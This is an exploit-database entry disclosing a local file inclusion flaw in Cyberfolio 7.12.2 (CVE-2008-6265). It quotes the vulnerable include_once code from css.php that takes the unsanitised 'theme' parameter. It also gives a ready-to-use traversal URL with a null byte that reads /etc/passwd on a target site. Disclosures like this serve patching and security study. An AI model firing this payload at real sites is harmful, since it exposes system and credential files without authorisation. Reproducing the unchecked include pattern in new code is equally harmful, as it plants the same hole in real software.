Cyberfolio 7.12.2 - 'theme' Local File Inclusion
Author: dun
type: webapps
platform: php
port:
date_added: 2008-11-07
date_updated: 2016-11-28
verified: 1
codes: OSVDB-52277;CVE-2008-6265
tags:
aliases:
screenshot_url:
application_url:
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ dun[at]strcpy.pl ]
##################################################################
# [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability #
##################################################################
#
# Script site: http://cyberfolio.org/
# Download: http://cyberfolio.org/Version-7-12-2
#
# Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
#
# Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
#
# ...
# if (file_exists("./themes/".$_GET[theme].".php")) {
# include_once("./themes/".$_GET[theme].".php"); // LFI
# }
# ...
#
#
###############################################
# Greetz: D3m0n_DE * str0ke * and otherz..
###############################################
[ dun / 2008 ]
*******************************************************************************************
# milw0rm.com [2008-11-08]